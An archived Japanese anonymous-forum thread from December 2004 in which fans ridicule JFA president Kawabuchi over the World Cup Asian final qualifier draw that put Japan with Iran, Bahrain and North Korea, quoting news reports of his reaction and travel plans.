121 : :04/12/07 08:29:25 ID:804v1miZ
ザスパ草津くらい控えで勝てや・・・あ、市船にあわや負けそうになったんだっけ?

122 :_:04/12/07 14:19:10 ID:S3i3PTJg
>>113
全ては電通のおかげ。
川渕は何もしてないよ。

123 : :04/12/08 20:11:28 ID:uij8LBh8
>>122
でも自分のおかげだと過信してたりするかも。
操られてるのも知らずに。

ところで協会は国士舘に対する処分は考えてるの?
JFLサイドの出番だろうけど。

124 : :04/12/08 23:41:42 ID:dqQo1v9R
>>123
自分が電通と博報堂を天秤に掛けて競り合わせ釣り上げたとでも
思ってそうだ罠。

125 : :04/12/09 15:58:04 ID:wwR58X8s
>>120
カピタンを怒らせたからだよ

126 : :04/12/09 18:10:01 ID:uQbDnCfh
川淵キャプテンは、希望する相手としてサウジ、ウズベキスタン、クウェートを挙げている。
http://www.sanspo.com/soccer/top/st200412/st2004120901.html

サッカー・ワールドカップ(W杯)ドイツ大会アジア最終予選の抽選会が9日、クアラルンプールで行われ、日本はB組に入り、
イラン、バーレーン、北朝鮮の3か国と対戦することになった。
http://headlines.yahoo.co.jp/hl?a=20041209-00000011-yom-spo

率直にアホだろ

127 : :04/12/09 18:48:11 ID:nS8WFwEf
全部裏目かよ

128 : :04/12/09 18:52:54 ID:bk2YQLcs
>>126
禿W
2の3乗だから12.5%か。87.5%とも言えるが。

面白すぎだよ、我らがカピタン! さすが。最高!

129 : :04/12/09 20:18:36 ID:s1vaoq7O
いや!きっとカピタンは本来あるべき組み合わせを言ったんだよ!

単に冷たいくじと熱いくじを間違えただけだよ!

…って今回のくじ、またボールだったんだっけ?


130 :__:04/12/09 21:24:07 ID:nu5uGxBq
北99,99%、イラン90%(韓国、サウジの政治力)、バーレーン80%(湾岸3ヶ国が
重なると怪しまれるため)
ぐらいの予想だっただろ。
カピタンは、皮肉を言っただけ。
もし、天然だったら、長嶋級だな。

131 : :04/12/09 23:19:12 ID:s1vaoq7O
>>130
いや。長嶋級というより

     キムコ級




132 : :04/12/10 00:11:11 ID:RjgVdoD2
「シビアだね」だってよw 天然だな。
まさにカピタン級。

水、飲みすぎるなよ。

133 : :04/12/10 00:21:55 ID:lFri5lXe
なにがシビアだよw
A組とたいしてかわらんし、むしろいいくらいだ。
日本はクウェートタイプに弱いこと分らんのかな?キャプテンは。

134 : :04/12/10 00:27:18 ID:qsT3rjxn
過ぎた事はさておき、中国審判団の回避に
全力を尽くして欲しいもんだ。

135 : :04/12/10 01:24:50 ID:u5P6tqQY
>>133
もう心は盲目でしょう。
名誉欲とアジア大会の奇妙な優勝に酔い痴れて。

136 :名無しさん:04/12/10 02:48:20 ID:NFzldhkG
可能性A:
日本の組        韓国の組
イラン          サウジアラビア 【モンジュンの横槍で、韓国がイラン回避】
バーレーン       ウズベキスタン 【中東が3チームにはならないから】
北朝鮮         クウェート    【鉄板】

可能性B:
日本の組        韓国の組
サウジアラビア    イラン       【小倉専務理事の力が上回った場合】
バーレーン       ウズベキスタン 【中東が3チームにはならないから】
北朝鮮         クウェート    【鉄板】

たった二つしかない可能性の一つが予定通りに決まっただけ!
かぴたんは韓国の希望を代弁しただけ・・・


137 : :04/12/10 03:41:03 ID:W9VFZ3jt
川淵は今から対北のアウェー対策練ろ
最初から最後まで放送はされるのか
チケット手配枚数

選手の安全確保
応援サポの危害有無
自己防衛万全川淵は池

138 : :04/12/10 05:42:49 ID:Ix0DT5Sq
川淵キャプテン「予想より厳しい」
http://www.yomiuri.co.jp/hochi/soccer/dec/o20041209_20.htm

表情は硬かった。「予想とは全く逆になった。厳しいな。シビアだな、というのが率直な感想だ」川淵キャプテン。
苦戦の思い出が強いイランとバーレーン。情報のない北朝鮮。「また眠れない日が続きそうだな」思わず本音が口をつく。

イランは強力だ。代表ゴール数世界NO1のFWダエイ、ブンデスリーガで活躍するMFマハダビキア、アジアMVPのカリミ。
「1人で突破出来る攻撃力は脅威。アジア杯を見てもかなり強敵だ」97年フランスW杯のプレーオフ、ジョホールバルで対戦し、一時は逆転され苦しめられた相手を警戒した。

バーレーンには今年のアジア杯でやはり苦しめられた。「かなりの技術レベルで高い戦術を持つチーム」とキャプテンは分析した。
そしてバーレーンとは来年6月にアウエーで対戦する。過去、夏の中東での公式戦はほとんど経験がない。
「特別に合宿を張る必要はないと思うが、暑さに関しては事前調査が必要だろう」50度を超える砂漠での対戦にも対策が必要だと話した。

そしてほとんど情報のない北朝鮮。平壌での試合も15年ぶりになる。
3か国ともアウエーの試合では直行便が少なく移動に時間がかかる。北朝鮮には直接飛べない。
川淵キャプテンは「全部チャーター機を飛ばす」と明言。北朝鮮に関しては外務省、国交省と調整が必要で、
現段階ではチャーター機の利用許可が出たとしても、バーレーンから直接入れる可能性は薄い。
中4日の日程だが一度日本に帰り平壌に入ることになりそうだ。

「予選突破の最低ラインは3勝2敗1分け。最も大切なのは初戦を勝つことだ」
川淵キャプテンはとにかく北朝鮮を粉砕して波に乗ることが必要だと力説した。

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)